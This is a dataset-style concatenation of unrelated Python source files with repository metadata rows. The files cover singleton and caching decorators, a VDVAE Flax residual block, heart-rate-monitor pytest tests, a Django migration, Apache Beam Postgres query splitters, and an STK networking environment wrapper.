return cls.__instance
@classmethod
def get_singleton(cls,*p,**k):
return cls.__instance or cls(*p,**k)
@classmethod
def clear_singleton(cls):
cls.__instance = None
class SingletonMap(object):
"""
This class allows distinct Singleton objects for each args combination.
The __new__ method is overriden to force Singleton behaviour, the Singleton
is created for the lowest subClass.
@warning although __new__ is overriden __init__ is still being called
for each instance=Singleton(), this is way we replace it by __dub_init
"""
## Singleton object
# the one, true Singleton, private members cannot be read directly
__instances = {}
__dumb_init = (lambda self,*p,**k:None)
def __new__(cls, *p, **k):
key = cls.parse_instance_key(*p,**k)
if cls != type(cls.__instances.get(key)):
__instance = object.__new__(cls)
__instance.__instance_key = key
#srubio:added init_single check to prevent redundant __init__ calls
if hasattr(cls,'__init__') and cls.__init__ != cls.__dumb_init:
setattr(cls,'init_single',cls.__init__)
#Needed to avoid parent __init__ methods to be called
setattr(cls,'__init__',cls.__dumb_init)
if hasattr(cls,'init_single'):
#If no __init__ or init_single has been defined it may trigger
#an object.__init__ warning!
cls.init_single(__instance,*p,**k)
cls.__instances[key] = __instance
#print('#'*80+'\n'+'%s.__instances[%s] = %s'
# %(str(cls),key,str(__instance))
return cls.__instances[key]
@classmethod
def get_singleton(cls,*p,**k):
key = cls.parse_instance_key(*p,**k)
return cls.__instances.get(key,cls(*p,**k))
@classmethod
def get_singletons(cls):
return cls.__instances
@classmethod
def clear_singleton(cls,*p,**k):
cls.__instances.pop(cls.parse_instance_key(*p,**k))
@classmethod
def clear_singletons(cls):
cls.__instances.clear()
@classmethod
def parse_instance_key(cls,*p,**k):
return '%s(*%s,**%s)' % (cls.__name__,list(p),list(sorted(k.items())))
def get_instance_key(self):
return self.__instance_key
###############################################################################
class nullDecorator(object):
"""
Empty decorator with null arguments, used to replace pyqtSignal,pyqtSlot
"""
def __init__(self,*args):
pass
def __call__(self,f):
return f
def decorator_with_args(decorator):
'''
Decorator with Arguments must be used with parenthesis: @decorated()
, even when arguments are not used!!!
This method gets an d(f,args,kwargs) decorator and returns a new
single-argument decorator that embeds the new call inside.
But, this decorator disturbed stdout!!!!
There are some issues when calling nested decorators; it is clearly
better to use Decorator classes instead.
'''
# decorator_with_args = lambda decorator: \
# lambda *args, **kwargs: lambda func: decorator(func, *args, **kwargs)
return lambda *args, **kwargs: lambda func: decorator(func, *args, **kwargs)
class Decorated(object):
"""
@TODO: This class should provide an API to get all decorators
applied to a python object and its methods
"""
pass
class Decorator(object):
"""
This generic class allows to differentiate decorators from common classes.
"""
__example__ = """
SEE THE Cached DECORATOR CLASS FOR A REAL EXAMPLE, THIS IS JUST AN
ABSTRACT CLASS WITHOUT IMPLEMENTATION
It uses the __get__ descriptor to allow decoration of Class methods
Inherit from it and use issubclass(klass,Decorator) to know if a class
is a decorator
To add arguments to decorator reimplement __init__
To modify your wrapper reimplement __call__
A decorator __init__ with a single argument can be called like:
@D
def f(x):
pass
If you need a Decorator with arguments then __init__ will manage the
arguments and __call__ will take the function and return a wrapper instead.
@D(x,y)
def f(z):
pass
"""
@classmethod
def new_wrapped_instance(cls, *args, **kwargs):
""" obtain a better wrapped instance, experimental, doesnt work well on py2 """
func = args and args[0] or None
i = object.__new__(type(cls.__name__+'_'+func.__name__,(cls,),
{'__doc__': func.__doc__}))
cls.__init__(i,*args,**kwargs)
return i
def __init__(self,func):
self.func = func
#self.call = wraps(self.func)(self.__call__) #Not for methods!!
functools.update_wrapper(self,self.func)
def __call__(self,*args,**kwargs):
return self.func(*args,**kwargs)
def __get__(self,obj,objtype=None):
"""
This bounding method will be called only when decorating an
instance method
"""
return MethodType(self,obj,objtype)
def get_func(self):
return self.func
class ClassDecorator(Decorator):
"""
This empty class is not trivial. It identifies the QObject decorators
from fandango.qt module
Although empty, it is critical for Vacca. Modify it with care
"""
pass
class Cached(Decorator):
"""
This decorator will provide a function that caches up to N different
executions of a method (for different combinations of arguments) for
a given period. It is very similar to functools.lru_cache in py3
"""
__example__ = """
e.g.: check_device_cached = Cached(check_device,depth=10,keep=3)
It will keep cached for 3 seconds up to 10 different device check results.
If "func" is not declared, then it can be used as a decorator_with_args
@Cached(depth=10,keep=3)
def check_device(*a,**k):
...
return
The catched argument will print and return exceptions instead of throwing
"""
def __init__(self,func=None,depth=10,expire=3.,log=False,catched=False):
self.log = log
self._im = None
self.cache = {}
self.depth = depth
self.expire = expire
self.catched = catched
self.decorate(func)
#self.__code__ = getattr(func,'__code__',None)
self.__doc__ = '@Cached:'+str(getattr(func,'__doc__','') or '')
self.lock = threading.Lock()
def __call__(self,*args,**kwargs):
"""
This method will either decorate a method (with args) or execute it
"""
if self.func is None:
# Deferred decorator
self.decorate(args[0])
return self
else:
# Instantiated decorator
return self.execute(*args,**kwargs)
def _log(self,msg):
if isCallable(self.log):
self.log(msg)
elif self.log:
print(msg)
@staticmethod
def getCachedObject(obj,methods=[],depth=10.,expire=3.,catched=False):
""" @RISKY
This method will try to apply Cached decorator to all methods
of an object. USE IT AT YOUR OWN RISK!!
"""
klass = obj if isinstance(obj,type) else type(obj)
if not methods:
methods = [k for k,f in klass.__dict__.items() if isCallable(f)]
for k in methods:
try:
m = Cached(getattr(klass,k),depth,expire,catched=catched)
setattr(obj,k,m)
except:pass
return obj
def decorate(self,func):
if isCallable(func):
#self._log('decorate(%s)'%str(func))
self.func = func
#self.call = wraps(self.func)(self.__call__) #Not for methods!!
functools.update_wrapper(self,self.func)
else:
self.func = None
def prune(self,expire=None,depth=None):
try:
self.lock.acquire()
depth = notNone(depth,self.depth)
expire = time.time()-notNone(expire,self.expire)
cache = sorted(k for k in self.cache.keys() if k[0]>expire)
if (len(cache)!=len(self.cache) or len(cache)>self.depth):
#self._log('pruning: %s => %s'%(len(self.cache),len(cache)))
pass
self.cache = dict((k,self.cache[k]) for k in cache[-self.depth:])
return sorted(self.cache.keys())
finally:
self.lock.release()
def clear(self):
self.cache.clear()
def execute(self,*args,**kwargs):
#self._log('__call__(%s,%s)'%(args,kwargs))
v,match,expire = None,None,self.expire
try:
key = time.time(),tuple(args),tuple(kwargs.items())
#assert all(isinstance(k,Hashable) for l in key[1:] for k in l)
assert isHashable(key)
except:
self._log('unhashable arguments!')
expire = 0
if not self.depth or not expire:
self._log('disabling cache ...')
if not self.depth: self.cache = {}
return self.func(*args,**kwargs)
else:
cache = self.prune(expire)
match = first((k for k in cache if (k[1:]) == (key[1:])),None)
if match:
v = self.cache[match]
#self._log('(%s,%s) was in cache: %s'%(args,kwargs,v))
else:
try:
v = self.func(*args,**kwargs)
except Exception,e:
v = e
#self._log('%s(%s,%s) = %s'%(self.func,args,kwargs,v))
try:
self.cache[key] = v
except:
print('%s(%s,%s) = %s'%(self.func,args,kwargs,v))
print('cache[%s] = %s'%(key,v))
raise
if isinstance(v,Exception):
if self.catched:
if not match:
self._log(traceback.format_exc())
return v
else:
self._log(str(self.func))
self._log(traceback.format_exc())
raise v
else:
return v
###########################################################################
## @DEPRECATED!
class BoundDecorator(Decorator):
"""
DEPRECATED , To be removed in Fandango 13;
replaced by the use of __get__ descriptor
Inspired in
https://wiki.python.org/moin/PythonDecoratorLibrary
#Class_method_decorator_using_instance
Class method decorator specific to the instance.
It uses a descriptor to delay the definition of the
method wrapper.
To use it, just inherit from it and rewrite the wrapper method
Example:
from fandango.objects import BoundDecorator
BoundDecorator().tracer = 1
class X(object):
def __init__(self,name):
self.name = name
def f(self,*args):
return (self.name,args)
class D(BoundDecorator):
@staticmethod
def wrapper(instance,f,*args,**kwargs):
print('guess what?')
v = f(instance,*args,**kwargs)
return v[0]
x = X('a')
X.f = D()(X.f)
x.f()
"""
def __init__(self,*args,**kwargs):
print('BoundDecorator is DEPRECATED!!!, Use Decorator.__get__ instead')
Decorator.__init__(self,*args,**kwargs)
@staticmethod
def wrapper(instance,f,*args,**kwargs):
return f(instance, *args, **kwargs)
class _Tracer(object):
def __init__(self):
self._trace = False
def __get__(self,obj,type=None):return self
def __set__(self,obj,value):self._trace = value
def __nonzero__(self): return self._trace
def __call__(self,msg):
if self: print(msg)
#NOTE: Giving a value to Tracer only works with instances; not from class
tracer = _Tracer()
def __call__(this,f=None):
class _Descriptor(BoundDecorator):
# Inherits to get the wrapper from the BoundDecorator class
# and be able to exist "onDemand"
def __init__(self, f):
self.func = f
def __get__(self, instance, klass):
BoundDecorator.tracer('__get__(%s,%s)'%(instance,klass))
if instance is None:
# Class method was requested
return self.make_unbound(klass)
return self.make_bound(instance)
def make_unbound(self, klass):
BoundDecorator.tracer('make_unbound(%s)'%klass)
@functools.wraps(self.func)
def wrapper(*args, **kwargs):
'''This documentation will disapear :)
This method may work well only without arguments
'''
BoundDecorator.tracer(
"Called the unbound method %s of %s"
%(self.func.__name__, klass.__name__))
return partial(this.wrapper,f=f)(*args,**kwargs)
return wrapper
def make_bound(self, instance):
BoundDecorator.tracer('make_bound(%s)'%instance)
@functools.wraps(self.func)
def wrapper(*args, **kwargs):
'''This documentation will disapear :)'''
BoundDecorator.tracer(
"Called the decorated method %s of %s"
%(self.func.__name__, instance))
#return self.func(instance, *args, **kwargs)
return this.wrapper(instance,f,*args,**kwargs)
#wrapper = self.wrapper #wraps(self.func)(self.wrapper)
# This instance does not need the descriptor anymore,
# let it find the wrapper directly next time:
setattr(instance, self.func.__name__, wrapper)
return wrapper
return _Descriptor(f)
from . import doc
__doc__ = doc.get_fn_autodoc(__name__,vars())
| 33.938967
| 89
| 0.56135
| 24,906
| 0.689058
| 0
| 0
| 3,377
| 0.093429
| 0
| 0
| 14,820
| 0.410015
|
0b42ef18819891116ae94c7d2436b4f0dab7c2b9
| 5,877
|
py
|
Python
|
vdvae_flax/blocks.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 23,901
|
2018-10-04T19:48:53.000Z
|
2022-03-31T21:27:42.000Z
|
vdvae_flax/blocks.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 891
|
2018-11-10T06:16:13.000Z
|
2022-03-31T10:42:34.000Z
|
vdvae_flax/blocks.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 6,047
|
2018-10-12T06:31:02.000Z
|
2022-03-31T13:59:28.000Z
|
# coding=utf-8
# Copyright 2021 DeepMind Technologies Limited and the Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Building blocks for VDVAE."""
from typing import Optional, Tuple
import chex
from flax import linen as nn
import jax
_NUM_CONV_LAYER_PER_BLOCK = 4
def get_vdvae_convolution(output_channels,
kernel_shape,
weights_scale = 1.,
name = None,
precision = None):
"""Builds a 2D convolution.
Args:
output_channels: number of output channels.
kernel_shape: shape of convolutional kernel.
weights_scale: scale of initial weights in the convolution.
name: name of the module.
precision: jax precision.
Returns:
a nn.Conv2D.
"""
kernel_init = nn.initializers.variance_scaling(
scale=weights_scale, mode='fan_in', distribution='truncated_normal')
return nn.Conv(
features=output_channels,
kernel_size=kernel_shape,
strides=(1, 1),
padding='SAME',
use_bias=True,
kernel_init=kernel_init,
name=name,
precision=precision)
class ResBlock(nn.Module):
"""Residual block from the VDVAE paper.
This block is made of four convolutions, followed by an optional residual
connection and an optional average pooling to downsample the image.
Compared to the paper, it uses the same gelu non-linearity but no batch
normalization.
It also accepts as an optional input an auxiliary batch of context vectors to
be processed by 1x1 convolutions. This is typically useful to condition a VAE
on an embedded context.
"""
internal_channels: int
output_channels: int
downsampling_rate: int = 1
use_residual_connection: bool = False
last_weights_scale: float = 1.
precision: Optional[jax.lax.Precision] = None
@nn.compact
def __call__(
self,
inputs,
context_vectors = None,
):
"""Applies the res block to input images.
Args:
inputs: a rank-4 array of input images of shape (B, H, W, C).
context_vectors: optional auxiliary inputs, typically used for
conditioning. If set, they should be of rank 2, and their first (batch)
dimension should match that of `inputs`. Their number of features is
arbitrary. They will be reshaped from (B, D) to (B, 1, 1, D) and a 1x1
convolution will be applied to them.
Returns:
a the rank-4 output of the block.
"""
if self.downsampling_rate < 1:
raise ValueError('downsampling_rate should be >= 1, but got '
f'{self.downsampling_rate}.')
def build_layers(inputs):
"""Build layers of the ResBlock given a batch of inputs."""
resolution = inputs.shape[1]
if resolution > 2:
kernel_shapes = ((1, 1), (3, 3), (3, 3), (1, 1))
else:
kernel_shapes = ((1, 1), (1, 1), (1, 1), (1, 1))
conv_layers = []
aux_conv_layers = []
for layer_idx, kernel_shape in enumerate(kernel_shapes):
is_last = layer_idx == _NUM_CONV_LAYER_PER_BLOCK - 1
num_channels = self.output_channels if is_last else self.internal_channels
weights_scale = self.last_weights_scale if is_last else 1.
conv_layers.append(
get_vdvae_convolution(
num_channels,
kernel_shape,
weights_scale,
name=f'c{layer_idx}',
precision=self.precision))
aux_conv_layers.append(
get_vdvae_convolution(
num_channels, (1, 1),
0.,
name=f'aux_c{layer_idx}',
precision=self.precision))
return conv_layers, aux_conv_layers
chex.assert_rank(inputs, 4)
if inputs.shape[1] != inputs.shape[2]:
raise ValueError('VDVAE only works with square images, but got '
f'rectangular images of shape {inputs.shape[1:3]}.')
if context_vectors is not None:
chex.assert_rank(context_vectors, 2)
inputs_batch_dim = inputs.shape[0]
aux_batch_dim = context_vectors.shape[0]
if inputs_batch_dim != aux_batch_dim:
raise ValueError('Context vectors batch dimension is incompatible '
'with inputs batch dimension. Got '
f'{aux_batch_dim} vs {inputs_batch_dim}.')
context_vectors = context_vectors[:, None, None, :]
conv_layers, aux_conv_layers = build_layers(inputs)
outputs = inputs
for conv, auxiliary_conv in zip(conv_layers, aux_conv_layers):
outputs = conv(jax.nn.gelu(outputs))
if context_vectors is not None:
outputs += auxiliary_conv(context_vectors)
if self.use_residual_connection:
in_channels = inputs.shape[-1]
out_channels = outputs.shape[-1]
if in_channels != out_channels:
raise AssertionError('Cannot apply residual connection because the '
'number of output channels differs from the '
'number of input channels: '
f'{out_channels} vs {in_channels}.')
outputs += inputs
if self.downsampling_rate > 1:
shape = (self.downsampling_rate, self.downsampling_rate)
outputs = nn.avg_pool(
outputs, window_shape=shape, strides=shape, padding='VALID')
return outputs
| 35.618182
| 82
| 0.650842
| 4,222
| 0.718394
| 0
| 0
| 3,521
| 0.599115
| 0
| 0
| 2,535
| 0.431343
|
0b43e92ff65dfbae4bcf1fe66e16f6008f379b22
| 2,605
|
py
|
Python
|
test_hrm_code.py
|
liameirose/bme590hrm
|
d44573b73b46b121a31667c12bb6add4e8a8daa7
|
[
"MIT"
] | null | null | null |
test_hrm_code.py
|
liameirose/bme590hrm
|
d44573b73b46b121a31667c12bb6add4e8a8daa7
|
[
"MIT"
] | 2
|
2018-10-20T22:16:56.000Z
|
2018-10-25T23:56:43.000Z
|
test_hrm_code.py
|
liameirose/bme590hrm
|
d44573b73b46b121a31667c12bb6add4e8a8daa7
|
[
"MIT"
] | null | null | null |
import pytest
import json
import numpy as np
@pytest.mark.parametrize("candidate, expected", [
(1.345, True),
(-4.554, True),
('9999', True)
])
def test_number_please(candidate, expected):
from hrm_code import number_please
assert number_please(candidate) == expected
def test_import_data():
from hrm_code import import_data
[time, voltage] = import_data("test_data/test_data2.csv")
assert time[0] == 0
assert voltage[0] == -0.345
def test_calc_duration():
from hrm_code import calc_duration
fake_time = [0, 1, 2, 3, 4.3, 5, 6, 7.2]
dur = calc_duration(fake_time)
assert dur == 7.2
def test_find_min_max_volt():
from hrm_code import find_max_min_volt
fake_voltage = [1.2, -0.3, 4.8, 0, -3]
both = find_max_min_volt(fake_voltage)
assert both == [-3, 4.8]
def test_calc_freq():
from hrm_code import calc_sample_freq
fake_time = [0, 0.5, 1, 1.5, 2]
fs = calc_sample_freq(fake_time)
assert fs == 2
def test_detect_peak():
from hrm_code import detect_peak
# Peaks should occur every 60 sec
fs = 60
t = np.arange(0, 5, 1/fs)
wave = abs(np.sin(t*np.pi)**20)
peaks = detect_peak(wave, fs, hrw=0.1)
assert peaks == [27, 87, 147, 207, 267]
def test_num_beat():
from hrm_code import num_beat
fake_peaklist = [1, 3, 4]
fake_time = [0, 0.5, 1, 1.5, 2, 2.5, 3]
[num_beats, beats] = num_beat(fake_time, fake_peaklist)
assert num_beats == 3
assert beats == [0.5, 1.5, 2]
def test_calc_bpm():
from hrm_code import calc_bpm
fake_num_beats = 20
fake_dur = 40
bpm = calc_bpm(fake_num_beats, fake_dur)
assert bpm == 30
def test_create_metrics():
from hrm_code import create_metrics
bpm = 70
both = [-1.4, 5.6]
dur = 30
num_beats = 80
beats = [0.5, 0.75, 0.8]
metrics = create_metrics(bpm, beats, both, dur, num_beats)
assert metrics == {
"mean_hr_bpm": 70,
"voltage extremes": [-1.4, 5.6],
"duration": 30,
"num_beats": 80,
"beats": [0.5, 0.75, 0.8]
}
def test_create_jason():
from hrm_code import create_jason
metrics = {"Favorite Ice Cream Flavor": "Chocolate",
"Favorite Book": "A Tree Grows in Brooklyn",
"Favorite Number": 8}
filename = "test_output.csv"
create_jason(filename, metrics)
read_file = json.load(open('test_output.json'))
assert read_file == {"Favorite Ice Cream Flavor": "Chocolate",
"Favorite Book": "A Tree Grows in Brooklyn",
"Favorite Number": 8}
| 26.05
| 69
| 0.621881
| 0
| 0
| 0
| 0
| 242
| 0.092898
| 0
| 0
| 372
| 0.142802
|
0b44a978913b26bbf0d8ab188b6560f82d0fe2d3
| 1,068
|
py
|
Python
|
core/migrations/0044_auto_20190510_0921.py
|
raheemazeezabiodun/art-backend
|
0bc47f3cf6f403101082f201c7fd1ca8108d5731
|
[
"MIT"
] | 4
|
2018-03-12T23:49:01.000Z
|
2020-07-06T17:37:29.000Z
|
core/migrations/0044_auto_20190510_0921.py
|
raheemazeezabiodun/art-backend
|
0bc47f3cf6f403101082f201c7fd1ca8108d5731
|
[
"MIT"
] | 259
|
2018-02-06T07:53:07.000Z
|
2020-06-05T19:18:32.000Z
|
core/migrations/0044_auto_20190510_0921.py
|
raheemazeezabiodun/art-backend
|
0bc47f3cf6f403101082f201c7fd1ca8108d5731
|
[
"MIT"
] | 22
|
2018-01-25T14:02:05.000Z
|
2020-06-24T20:37:01.000Z
|
# Generated by Django 2.1.7 on 2019-05-10 09:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0043_auto_20190424_1029'),
]
operations = [
migrations.RemoveField(
model_name='statetransition',
name='state',
),
migrations.AddField(
model_name='statetransition',
name='asset_state_from_report',
field=models.CharField(choices=[('requires repair', 'requires repair'), ('requires external assessment', 'requires external assessment'), ('Damaged', 'Damaged')], default='requires repair', max_length=50),
),
migrations.AddField(
model_name='statetransition',
name='incident_report_state',
field=models.CharField(choices=[('newly reported', 'newly reported'), ('internal assessment', 'internal assessment'), ('external assessment', 'external assessment'), ('out for repair', 'out for repair')], default='newly reported', max_length=50),
),
]
| 38.142857
| 258
| 0.634831
| 975
| 0.912921
| 0
| 0
| 0
| 0
| 0
| 0
| 477
| 0.446629
|
0b4772665a5a43688e79771eafbcfa9e4db57a1a
| 6,661
|
py
|
Python
|
postgres_connector/splitters.py
|
sandboxws/beam-postgres-connector
|
d08ed08e96991704fc234dd1e4d2ddf13f1885c1
|
[
"MIT"
] | null | null | null |
postgres_connector/splitters.py
|
sandboxws/beam-postgres-connector
|
d08ed08e96991704fc234dd1e4d2ddf13f1885c1
|
[
"MIT"
] | null | null | null |
postgres_connector/splitters.py
|
sandboxws/beam-postgres-connector
|
d08ed08e96991704fc234dd1e4d2ddf13f1885c1
|
[
"MIT"
] | null | null | null |
import re
from abc import ABCMeta, abstractmethod
from datetime import datetime
from typing import Callable, Iterator
from apache_beam.io import iobase
from apache_beam.io.range_trackers import (LexicographicKeyRangeTracker,
OffsetRangeTracker,
UnsplittableRangeTracker)
from dateutil.relativedelta import relativedelta
class BaseSplitter(metaclass=ABCMeta):
"""Splitters abstract class."""
def build_source(self, source):
"""Build source on runtime."""
self.source = source
@abstractmethod
def estimate_size(self):
"""Wrap :class:`~apache_beam.io.iobase.BoundedSource.estimate_size`"""
raise NotImplementedError()
@abstractmethod
def get_range_tracker(self, start_position, stop_position):
"""Wrap :class:`~apache_beam.io.iobase.BoundedSource.get_range_tracker`"""
raise NotImplementedError()
@abstractmethod
def read(self, range_tracker):
"""Wrap :class:`~apache_beam.io.iobase.BoundedSource.read`"""
raise NotImplementedError()
def split(self, desired_bundle_size, start_position=None, stop_position=None):
"""Wrap :class:`~apache_beam.io.iobase.BoundedSource.split`"""
raise NotImplementedError()
class DateSplitter(BaseSplitter):
"""Split bounded source by dates."""
pass
class IdsSplitter(BaseSplitter):
"""Split bounded source by any ids."""
def __init__(self, generate_ids_fn: Callable[[], Iterator], batch_size: int = 1000000):
self._generate_ids_fn = generate_ids_fn
self._batch_size = batch_size
def estimate_size(self):
# TODO: unify the method of estimating
return 0
def get_range_tracker(self, start_position, stop_position):
self._validate_query()
return LexicographicKeyRangeTracker(start_position, stop_position)
def read(self, range_tracker):
if range_tracker.start_position() is None:
ids = ",".join([f"'{id}'" for id in self._generate_ids_fn()])
else:
ids = range_tracker.start_position()
query = self.source.query.format(ids=ids)
for record in self.source.client.record_generator(query):
yield record
def split(self, desired_bundle_size, start_position=None, stop_position=None):
self._validate_query()
ids = []
for generated_id in self._generate_ids_fn():
ids.append(generated_id)
if len(ids) == self._batch_size:
yield self._create_bundle_source(desired_bundle_size, self.source, ids)
ids.clear()
yield self._create_bundle_source(desired_bundle_size, self.source, ids)
def _validate_query(self):
condensed_query = self.source.query.lower().replace(" ", "")
if re.search(r"notin\({ids}\)", condensed_query):
raise ValueError(f"Not support 'not in' phrase: {self.source.query}")
if not re.search(r"in\({ids}\)", condensed_query):
example = "SELECT * FROM tests WHERE id IN ({ids})"
raise ValueError(f"Require 'in' phrase and 'ids' key on query: {self.source.query}, e.g. '{example}'")
@staticmethod
def _create_bundle_source(desired_bundle_size, source, ids):
if isinstance(ids, list):
ids_str = ",".join([f"'{id}'" for id in ids])
elif isinstance(ids, str):
ids_str = ids
else:
raise ValueError(f"Unexpected ids: {ids}")
return iobase.SourceBundle(
weight=desired_bundle_size, source=source, start_position=ids_str, stop_position=None
)
class LimitOffsetSplitter(BaseSplitter):
"""Split bounded source by limit and offset."""
def __init__(self, batch_size: int = 1000000):
self._batch_size = batch_size
self._counts = 0
def estimate_size(self):
self._counts = self.source.client.counts_estimator(self.source.query)
return self._counts
def get_range_tracker(self, start_position, stop_position):
if self._counts == 0:
self._counts = self.source.client.counts_estimator(self.source.query)
if start_position is None:
start_position = 0
if stop_position is None:
stop_position = self._counts
return LexicographicKeyRangeTracker(start_position, stop_position)
def read(self, range_tracker):
offset, limit = range_tracker.start_position(), range_tracker.stop_position()
query = f"SELECT * FROM ({self.source.query}) as subq LIMIT {limit} OFFSET {offset}"
for record in self.source.client.record_generator(query):
yield record
def split(self, desired_bundle_size, start_position=None, stop_position=None):
if self._counts == 0:
self._counts = self.source.client.counts_estimator(self.source.query)
if start_position is None:
start_position = 0
if stop_position is None:
stop_position = self._counts
last_position = 0
for offset in range(start_position, stop_position, self._batch_size):
yield iobase.SourceBundle(
weight=desired_bundle_size, source=self.source, start_position=offset, stop_position=self._batch_size
)
last_position = offset + self._batch_size
yield iobase.SourceBundle(
weight=desired_bundle_size,
source=self.source,
start_position=last_position + 1,
stop_position=stop_position,
)
class NoSplitter(BaseSplitter):
"""No split bounded source so not work parallel."""
def estimate_size(self):
return self.source.client.rough_counts_estimator(self.source.query)
def get_range_tracker(self, start_position, stop_position):
if start_position is None:
start_position = 0
if stop_position is None:
stop_position = OffsetRangeTracker.OFFSET_INFINITY
return UnsplittableRangeTracker(OffsetRangeTracker(start_position, stop_position))
def read(self, range_tracker):
for record in self.source.client.record_generator(self.source.query):
yield record
def split(self, desired_bundle_size, start_position=None, stop_position=None):
if start_position is None:
start_position = 0
if stop_position is None:
stop_position = OffsetRangeTracker.OFFSET_INFINITY
yield iobase.SourceBundle(
weight=desired_bundle_size, source=self.source, start_position=start_position, stop_position=stop_position
)
| 37.632768
| 118
| 0.664465
| 6,242
| 0.937097
| 2,523
| 0.378772
| 958
| 0.143822
| 0
| 0
| 874
| 0.131212
|
0b479dbf807c903d09638149ff0de16acee169e3
| 5,827
|
py
|
Python
|
apis/python_interface_helpers/stk_env.py
|
davetrollope-fsml/sequence_toolkit
|
49495f679aad1d7c134cf8a189cca1e8acc9f4bd
|
[
"MIT"
] | null | null | null |
apis/python_interface_helpers/stk_env.py
|
davetrollope-fsml/sequence_toolkit
|
49495f679aad1d7c134cf8a189cca1e8acc9f4bd
|
[
"MIT"
] | null | null | null |
apis/python_interface_helpers/stk_env.py
|
davetrollope-fsml/sequence_toolkit
|
49495f679aad1d7c134cf8a189cca1e8acc9f4bd
|
[
"MIT"
] | null | null | null |
from stk_sequence import *
from stk_tcp_server import *
from stk_tcp_client import *
from stk_data_flow import *
from stk_options import stk_clear_cb
import time
class stk_callback:
def __init__(self):
self._caller = None
self._mapobj = None
pass
def add_callback_ref(self,caller):
self._caller = caller
def del_callback_ref(self,caller):
if self._caller:
self._caller.delCallback()
def add_callback_map_obj(self,mapobj):
self._mapobj = mapobj
def map_obj(self):
return self._mapobj
def close(self):
if self._caller:
self.del_callback_ref(self._caller)
self._caller = None
def caller(self):
return self._caller
def fd_created(self,df,fd):
pass
def fd_destroyed(self,df,fd):
pass
class stk_dispatcher_cb(stk_dispatch_cb_class):
def __init__(self,env,cbcls):
self.dispatchclass = stk_dispatch_cb_class.__init__(self)
self._cbcls = cbcls
self._env = env
def close(self):
#del self.dispatchclass
#self.dispatchclass = None
#del self.__class__.obj_map[stk_get_service_group_id(self._svcgrp)]
pass
def finddf(self,dfptr):
dfref = stk_ulong_df_to_df_ptr(dfptr)
df = stk_data_flow.find(dfptr)
if df == None:
dftype = stk_data_flow.type(dfptr)
if dftype == STK_TCP_ACCEPTED_FLOW or dftype == STK_TCP_SERVER_FLOW:
df = stk_tcp_server(self._env,None,None,None,dfref)
if dftype == STK_TCP_CLIENT_FLOW:
df = stk_tcp_client(self._env,None,None,None,dfref)
return df
def process_data(self,dfptr,seqptr):
seqref = stk_ulong_seq_to_seq_ptr(seqptr)
seq = stk_sequence.find(seqptr)
if seq == None:
seq = stk_sequence(self._env,None,None,0,0,None,seqref)
# the dfptr here is actually the C pointer converted to a ulong
df = self.finddf(dfptr)
self._cbcls.process_data(df,seq)
seq.unmap()
def process_name_response(self,dfptr,seqptr):
seqref = stk_ulong_seq_to_seq_ptr(seqptr)
seq = stk_sequence.find(seqptr)
if seq == None:
seq = stk_sequence(self._env,None,None,0,0,None,seqref)
# the dfptr here is actually the C pointer converted to a ulong
df = self.finddf(dfptr)
self._cbcls.process_name_response(df,seq)
seq.unmap()
pass
def process_monitoring_response(self,dfptr,seqptr):
pass
def fd_created(self,dfptr,fd):
# the dfptr here is actually the C pointer converted to a ulong
dfref = stk_ulong_df_to_df_ptr(dfptr)
df = stk_data_flow.find(dfptr)
if df == None:
# This sucks....
dftype = stk_data_flow.type(dfptr)
if dftype == STK_TCP_ACCEPTED_FLOW or dftype == STK_TCP_SERVER_FLOW:
df = stk_tcp_server(self._env,None,None,None,dfref)
# Err, UDP doesn't actually have connections so this really
# isn't likely to be needed - why would the app care about udp creations?
#elif dftype == STK_UDP_CLIENT_FLOW:
#df = stk_udp_client(self._env,None,None,None,dfref)
if df:
self._cbcls.fd_created(df,fd)
def fd_destroyed(self,dfptr,fd):
# the dfptr here is actually the C pointer converted to a ulong
dfref = stk_ulong_df_to_df_ptr(dfptr)
df = stk_data_flow.find(dfptr)
if df == None:
dftype = stk_data_flow.type(dfptr)
if dftype == STK_TCP_ACCEPTED_FLOW or dftype == STK_TCP_SERVER_FLOW:
df = stk_tcp_server(self._env,None,None,None,dfref)
if df:
self._cbcls.fd_destroyed(df,fd)
class stk_env:
def __init__(self,envopts):
self.caller = stk_dispatch_cb_caller()
envopts.append_dispatcher(self.caller.get_dispatcher())
self._opts = envopts
self._env = stk_create_env(envopts.ref())
self._dispatcher_stopped = False;
def close(self):
if self._env:
if self._opts:
stk_clear_cb(self._opts.ref(),"dispatcher")
if self.caller:
self.caller.detach_env(self._env)
stk_destroy_env(self._env)
if self.caller:
self.caller.close()
self.caller = None
self._env = None
def ref(self):
return self._env
def get_name_service(self):
return stk_env_get_name_service(self.ref())
def dispatch_timer_pools(self,interval):
stk_env_dispatch_timer_pools(self._env,interval)
def listening_dispatcher(self,df,svcgrp,appcb):
appcb.add_callback_ref(self.caller)
self._dispatcher_stopped = False
if self.caller.env_listening_dispatcher_add_fd(df.ref()) < 0:
return
while self._dispatcher_stopped == False:
self.caller.env_listening_dispatcher(df.ref(),stk_dispatcher_cb(self,appcb).__disown__(),200)
self.caller.env_listening_dispatcher_del_fd(df.ref())
def client_dispatcher_timed(self,appcb,timeout):
if appcb:
appcb.add_callback_ref(self.caller)
self.caller.env_client_dispatcher_timed(self._env,timeout,stk_dispatcher_cb(self,appcb).__disown__())
else:
self.caller.env_client_dispatcher_timed(self._env,timeout,None)
def stop_dispatcher(self):
self._dispatcher_stopped = True;
self.caller.env_stop_dispatching(self._env)
time.sleep(.2)
def terminate_dispatcher(self):
self.caller.env_terminate_dispatcher(self._env)
@classmethod
def append_name_server_dispatcher_cbs(cls,envopts,data_flow_group):
nsopts = envopts.find_option("name_server_options")
nsopts.update_ref(stk_append_name_server_fd_cbs(data_flow_group,nsopts.ref()))
